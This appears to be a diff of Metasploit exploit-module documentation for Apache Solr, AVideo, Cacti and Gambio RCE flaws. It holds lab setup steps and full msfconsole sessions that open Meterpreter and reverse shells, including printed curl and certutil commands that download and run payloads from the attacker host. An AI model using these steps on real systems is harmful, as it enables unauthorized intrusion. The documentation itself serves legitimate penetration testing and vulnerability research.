+      ZOO_CFG_EXTRA: "metricsProvider.className=org.apache.zookeeper.metrics.prometheus.PrometheusMetricsProvider metricsProvider.httpPort=7000 metricsProvider.exportJvmInfo=true"
+    volumes:
+      - .:/mnt/config
+volumes:
+  solr1:
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use apache_solr_backup_restore`
+1. Set the `RHOST`, `LHOST` and if required, the `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `solr` user.
+
+## Scenarios
+### Apache Solr 9.0.0 (no Authentication)
+
+```
+msf6 > use linux/http/apache_solr_backup_restore
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_solr_backup_restore) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/apache_solr_backup_restore) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/apache_solr_backup_restore) > options
+
+Module options (exploit/linux/http/apache_solr_backup_restore):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    no        Solr password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
+                                         ml
+   RPORT      8983             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  solr             no        Path to Solr
+   USERNAME   solr             no        Solr username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GCPCPUvxM        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/apache_solr_backup_restore) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Running check method
+[*] 127.0.0.1:8983: Authentication not required
+[*] Found Apache Solr 9.0.0
+[*] OS version is Linux amd64 6.6.16-linuxkit
+[+] The target appears to be vulnerable. Found Apache Solr version: 9.0.0
+[+] Uploaded configuration successfully
+[+] Backed up collection successfully
+[+] Backed up collection successfully
+[+] Uploaded configuration successfully
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[+] Successfully dropped the payload
+[*] Meterpreter session 12 opened (172.16.199.1:4444 -> 172.16.199.1:50057) at 2024-04-01 16:18:17 -0700
+[*] Cleaning up...
+
+meterpreter > getuid
+Server username: solr
+meterpreter > sysinfo
+Computer     : 192.168.128.2
+OS           : Ubuntu 20.04 (Linux 6.6.16-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### Apache Solr 9.0.0 with Authentication
+```
+msf6 exploit(linux/http/apache_solr_backup_restore) > set password SolrRocks
+password => SolrRocks
+msf6 exploit(linux/http/apache_solr_backup_restore) > set username solr
+username => solr
+msf6 exploit(linux/http/apache_solr_backup_restore) > set rhost 172.16.199.132
+rhost => 172.16.199.132
+msf6 exploit(linux/http/apache_solr_backup_restore) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/apache_solr_backup_restore) > options
+
+Module options (exploit/linux/http/apache_solr_backup_restore):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   SolrRocks        no        Solr password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.16.199.132   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
+                                         ml
+   RPORT      8983             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  solr             no        Path to Solr
+   USERNAME   solr             no        Solr username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      dkNrXBirxJx      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/apache_solr_backup_restore) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Running check method
+[*] Found Apache Solr 9.0.0
+[*] OS version is Linux amd64 6.5.0-26-generic
+[+] The target appears to be vulnerable. Found Apache Solr version: 9.0.0
+[+] Uploaded configuration successfully
+[+] Backed up collection successfully
+[+] Backed up collection successfully
+[+] Uploaded configuration successfully
+[*] Sending stage (3045380 bytes) to 172.16.199.132
+[+] Successfully dropped the payload
+[*] Meterpreter session 14 opened (172.16.199.1:4444 -> 172.16.199.132:41742) at 2024-04-01 16:25:16 -0700
+[*] Cleaning up...
+
+meterpreter > getuid
+Server username: solr
+meterpreter > sysinfo
+Computer     : 172.21.0.3
+OS           : Ubuntu 20.04 (Linux 6.5.0-26-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md

@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+This Metasploit module exploits an unauthenticated Remote Code Execution vulnerability in the AVideo platform,
+specifically within the WWBNIndex plugin.
+The vulnerability exists due to improper input validation in the `submitIndex.php` file, where the `systemRootPath` parameter
+is directly passed to a `require()` PHP function without proper sanitization.
+Attackers can exploit this by leveraging the PHP filter chaining technique
+to execute arbitrary PHP code on the server.
+The vulnerability is present in versions from 12.4 up to 14.2.
+
+To set up a vulnerable environment for testing, follow the installation steps provided in the AVideo documentation for running with Docker:
+<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>.
+Ensure AVideo version installed is between 12.4 and 14.2 and the WWBIndex plugin is installed.
+This can be done by verifying `/var/www/html/AVideo/plugin/WWBNIndex` exists.
+
+## Verification Steps
+
+1. Start `msfconsole` in your Metasploit framework.
+2. Use the module: `use exploit/multi/http/avideo_wwbnindex_unauth_rce`.
+3. Set `RHOSTS` to the target's address where the AVideo platform is installed.
+4. Set `TARGETURI` to the base path of the AVideo installation if it is not at the root directory (default is `/`).
+5. Optionally, configure other options such as `SSL` and `RPORT` if the target environment requires it.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload, granting access according to the payload's capabilities.
+
+## Options
+
+No options
+
+## Scenarios
+
+### Successful Exploitation against AVideo Platform with WWBNIndex plugin version 12.9
+
+**Setup**:
+
+- Target: AVideo platform with WWBNIndex plugin version 12.9 installed in a Docker container.
+- Attacker: Metasploit Framework.
+
+**Example**:
+
+```
+msf6 > search avideo
+
+Matching Modules
+================
+
+   #  Name                                            Disclosure Date  Rank       Check  Description
+   -  ----                                            ---------------  ----       -----  -----------
+   0  exploit/multi/http/avideo_wwbnindex_unauth_rce  2024-04-04       excellent  Yes    AVideo WWBNIndex Plugin Unauthenticated RCE
+   1    \_ target: Automatic                          .                .          .      .
+   2    \_ target: PHP In-Memory                      .                .          .      .
+   3    \_ target: Unix In-Memory                     .                .          .      .
+   4    \_ target: Windows In-Memory                  .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/avideo_wwbnindex_unauth_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'
+
+msf6 > use 3
+[*] Additionally setting TARGET => Unix In-Memory
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > options
+
+Module options (exploit/multi/http/avideo_wwbnindex_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      nhjkrZakk        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set rhosts 192.168.100.20
+rhosts => 192.168.100.20
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lhost eth0
+lhost => 192.168.100.10
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lport 1337
+lport => 1337
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set fetch_srvport 5000
+fetch_srvport => 5000
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (3045380 bytes) to 192.168.100.20
+[*] Meterpreter session 1 opened (192.168.100.10:1337 -> 192.168.100.20:52936) at 2024-04-04 23:08:05 +0200
+
+meterpreter > sysinfo
+Computer     : 192.168.100.20
+OS           : Ubuntu 20.04 (Linux 5.4.0-169-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down session: 1
+
+[*] 192.168.100.20 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > use 2
+[*] Additionally setting TARGET => PHP In-Memory
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (39927 bytes) to 192.168.100.20
+[*] Meterpreter session 2 opened (192.168.100.10:1337 -> 192.168.100.20:36258) at 2024-04-04 23:08:44 +0200
+
+meterpreter > getuid
+Server username: www-data
+```

documentation/modules/exploit/multi/http/cacti_package_import_rce.md

@@ -0,0 +1,284 @@
+## Vulnerable Application
+
+This exploit module leverages an arbitrary file write vulnerability
+(CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It abuses
+the `Import Packages` feature to upload a specially crafted package that embeds
+a PHP file. Cacti will extract this file to an accessible location. The module
+finally triggers the payload to execute arbitrary PHP code in the context of
+the user running the web server.
+
+Authentication is needed and the account must have access to the `Import
+Packages` feature. This is granted by setting the `Import Templates` permission
+in the `Template Editor` section.
+
+
+## Installation
+
+### Docker installation of Cacti version 1.2.26
+- Create the following files (based on the files from [here](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169)):
+  - `docker-compose.yml`:
+```
+version: '2'
+services:
+  web:
+    build: ./cacti
+    ports:
+     - "8080:80"
+    depends_on:
+     - db
+    entrypoint:
+     - bash
+     - /entrypoint.sh
+    volumes:
+     - ./entrypoint.sh:/entrypoint.sh
+    command: apache2-foreground
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cacti
+```
+  - `entrypoint.sh`:
+```
+#!/bin/bash
+set -ex
+
+wait-for-it db:3306 -t 300 -- echo "database is connected"
+if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
+    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti/cacti.sql
+    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
+    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
+fi
+
+chown www-data:www-data -R /var/www/html
+# first arg is `-f` or `--some-option`
+if [ "${1#-}" != "$1" ]; then
+  set -- apache2-foreground "$@"
+fi
+
+exec "$@"
+```
+- Create a `./cacti/` directory with `mkdir cacti`
+- Add the following files in the `./cacti/` folder (based on the files from
+  [here](https://github.com/vulhub/vulhub/tree/master/base/cacti/1.2.22):
+  - `Dockerfile`:
+```
+FROM php:7.4-apache
+
+RUN apt-get update && \
+    apt-get install -y --no-install-recommends rrdtool snmp wget ca-certificates libsnmp-dev default-mysql-client \
+            wait-for-it libjpeg62-turbo-dev libpng-dev libfreetype6-dev libgmp-dev libldap2-dev libicu-dev
+
+RUN docker-php-ext-configure gd --with-freetype --with-jpeg &&\
+    docker-php-ext-configure intl &&\
+    docker-php-ext-configure pcntl --enable-pcntl &&\
+    docker-php-ext-install pdo_mysql snmp gmp ldap sockets gd intl pcntl gettext
+
+RUN mkdir /var/www/html/cacti &&\
+    wget -qO- https://files.cacti.net/cacti/linux/cacti-1.2.26.tar.gz | tar zx -C /var/www/html/cacti --strip-components 1
+
+COPY config.php /var/www/html/cacti/include/config.php
+COPY cacti.ini /usr/local/etc/php/conf.d/cacti.ini
+```
+  - `cacti.ini`
+```
+display_errors=off
+memory_limit=512M
+date.timezone=UTC
+max_execution_time=120
+```
+  - `config.php`
+```
+<?php
+$database_type     = 'mysql';
+$database_default  = 'cacti';
+$database_hostname = 'db';
+$database_username = 'root';
+$database_password = 'root';
+$database_port     = '3306';
+$database_retries  = 5;
+$database_ssl      = false;
+$database_ssl_key  = '';
+$database_ssl_cert = '';
+$database_ssl_ca   = '';
+$database_persist  = false;
+$poller_id = 1;
+$url_path = '/cacti/';
+$cacti_session_name = 'Cacti';
+$cacti_db_session = false;
+$disable_log_rotation = false;
+```
+- Run `docker-compose up`
+- Access http://127.0.0.1:8080
+- Login with the `admin` user (password: `admin`)
+- Follow the installation steps (accept every default settings and ignore the pre-installation checks suggestions)
+
+Note that other versions can be installed this way by changing the `tar` file name in `Dockerfile` (`cacti-1.2.26.tar.gz`).
+
+
+### Cacti on Windows
+Download and run a Cacti installer from
+[here](https://files.cacti.net/cacti/windows/Archive/). The `admin` password
+should be put in a file called `Cacti-Passwords.txt` by the installer, which is
+in the same location the installer was run.
+Follow the same installation steps as for the Docker installation.
+
+
+### Setup a new user
+- Login with the `admin` user (password: `admin`)
+- Go to `Configuration` > `Users`
+- Click on the `+` sign
+- Enter the `User Name`, `Password` and check the `Enabled` option.
+- Click `Create`
+- Go to the `Permissions` tab and set the `Import Templates` permission in `Template Editor`
+- Click `Save`
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use multi/http/cacti_package_import_rce`
+1. Do: `set target <target>`
+1. Do: `run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>`
+1. You should get a shell.
+
+## Options
+
+### USERNAME
+The user to login with (default `admin`).
+
+### PASSWORD
+The password to login with (default `admin`)
+
+
+## Scenarios
+
+### Cacti version 1.2.26 on Docker installation
+- Target 0 (PHP)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=127.0.0.1 rport=8080 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Sending stage (39927 bytes) to 192.168.101.1
+[+] Deleted /var/www/html/cacti/resource/jGbP1O.php
+[*] Meterpreter session 1 opened (192.168.101.1:4444 -> 192.168.101.1:62197) at 2024-05-22 15:28:24 +0200
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 087c6bbb8c7d
+OS          : Linux 087c6bbb8c7d 6.6.22-linuxkit #1 SMP PREEMPT_DYNAMIC Fri Mar 29 12:23:08 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+- Target 1 (Linux Command)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=127.0.0.1 rport=8080 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Command to run on remote host: curl -so ./AynGghlaARy http://192.168.101.1:8080/DETWAARvN-XS_WA2cHnmIg; chmod +x ./AynGghlaARy; ./AynGghlaARy &
+[*] Fetch handler listening on 192.168.101.1:8080
+[*] HTTP server started
+[*] Adding resource /DETWAARvN-XS_WA2cHnmIg
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Client 192.168.101.1 requested /DETWAARvN-XS_WA2cHnmIg
+[*] Sending payload to 192.168.101.1 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.101.1
+[+] Deleted /var/www/html/cacti/resource/R4imZxgqN.php
+[+] Deleted /var/www/html/cacti/resource/AynGghlaARy
+[*] Meterpreter session 3 opened (192.168.101.1:4444 -> 192.168.101.1:62224) at 2024-05-22 15:29:31 +0200
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 172.19.0.3
+OS           : Debian 11.5 (Linux 6.6.22-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Cacti version 1.2.26 on Windows Server 2019
+- Target 0 (PHP)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=192.168.101.124 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Sending stage (39927 bytes) to 192.168.101.124
+[+] Deleted C:/Apache24/htdocs/cacti/resource/WPo04nIf.php
+[*] Meterpreter session 2 opened (192.168.101.1:4444 -> 192.168.101.124:54654) at 2024-05-22 15:28:56 +0200
+
+meterpreter > getuid
+Server username: SYSTEM
+meterpreter > sysinfo
+Computer    : DC02
+OS          : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
+Meterpreter : php/windows
+```
+
+- Target 2 (Windows Command)
+```
+msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=192.168.101.124 lhost=192.168.101.1 username=msfuser password=12345678
+
+[*] Command to run on remote host: certutil -urlcache -f http://192.168.101.1:8080/Qy-qOX10kZIXJGk3Q336Lg %TEMP%\cpOhjtfIddh.exe & start /B %TEMP%\cpOhjtfIddh.exe
+[*] Fetch handler listening on 192.168.101.1:8080
+[*] HTTP server started
+[*] Adding resource /Qy-qOX10kZIXJGk3Q336Lg
+[*] Started reverse TCP handler on 192.168.101.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.26
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `package_import.php`
+[+] The target appears to be vulnerable.
+[*] Uploading the package
+[*] Triggering the payload
+[*] Client 192.168.101.124 requested /Qy-qOX10kZIXJGk3Q336Lg
+[*] Sending payload to 192.168.101.124 (Microsoft-CryptoAPI/10.0)
+[*] Client 192.168.101.124 requested /Qy-qOX10kZIXJGk3Q336Lg
+[*] Sending payload to 192.168.101.124 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 192.168.101.124
+[+] Deleted C:/Apache24/htdocs/cacti/resource/9PxU2R.php
+[*] Meterpreter session 4 opened (192.168.101.1:4444 -> 192.168.101.124:54669) at 2024-05-22 15:30:20 +0200
+[!] This exploit may require manual cleanup of 'C:/Apache24/htdocs/cacti/resource/cpOhjtfIddh' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC02
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MYLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+```

documentation/modules/exploit/multi/http/gambio_unauth_rce_cve_2024_23759.md

@@ -0,0 +1,231 @@
+## Vulnerable Application
+
+A Remote Code Execution vulnerability in Gambio online webshop version `4.9.2.0` and lower allows remote attackers
+to run arbitrary commands via unauthenticated HTTP POST requests. Gambio version 3 is not vulnerable.
+The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
+which ultimately allows an attacker to execute remote code on affected systems.
+
+The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.
+
+This module has been tested with:
+* Gambio online webshop `4.7.2.0` on Ubuntu `22.04` running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.
+
+## Installation steps to install the Gambio Online Webshop
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download the Gambio Webshop software from [here](https://www.dmsolutions.de/gambio-download.html).
+* Unzip the package `Gambio v4.7.2.0.zip` and install the Gambio Online Webshop on your Linux Virtual Machine
+* using the installation instructions provided in the ZIP file. Do not use a Windows VM (see Limitations section).
+* When installed, you should be able to access the Webshop  either thru `HTTP` port 80 or `HTTPS` port 443
+* depending on your configuration settings.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/gambio_unauth_rce_cve_2024_23759`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename without extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+```msf
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > info
+
+       Name: Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability
+     Module: exploit/multi/http/gambio_unauth_rce_cve_2024_23759
+   Platform: PHP, Unix, Linux
+       Arch: php, cmd, x64, x86
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-01-19
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  usd Herolab
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>    0   PHP
+      1   Unix Command
+      2   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.201.25   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasplo
+                                        it/basics/using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Gambia Webshop endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+  WEBSHELL                    no        Set webshell name without extension. Name will be randomly generated if
+                                         left unset.
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address
+                                       on the local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+
+  When TARGET is not 0:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+Payload information:
+
+Description:
+  A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower
+  allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.
+  The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
+  which ultimately allows an attacker to execute remote code on affected systems.
+  The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
+  As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+  potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+  to sensitive information.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-23759
+  https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759
+  https://herolab.usd.de/en/security-advisories/usd-2023-0046/
+
+
+View the full module info with the info -d command.
+```
+
+### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
+```msf
+msf6 > use exploits/multi/http/gambio_unauth_rce_cve_2024_23759
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rhosts 192.168.201.25
+rhosts => 192.168.201.25
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rport 80
+rport => 80
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:80 can be exploited.
+[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.25
+[+] Deleted GmacadJjQQOXMux.php
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:60348) at 2024-03-24 09:15:50 +0000
+
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www
+meterpreter > exit
+```
+
+### Target 1 - Unix Command `cmd/unix/reverse_bash` session
+```msf
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 1
+target => 1
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:80 can be exploited.
+[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted UJoQmnhL.php
+[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:50728) at 2024-03-24 09:17:46 +0000
+
+uname -a
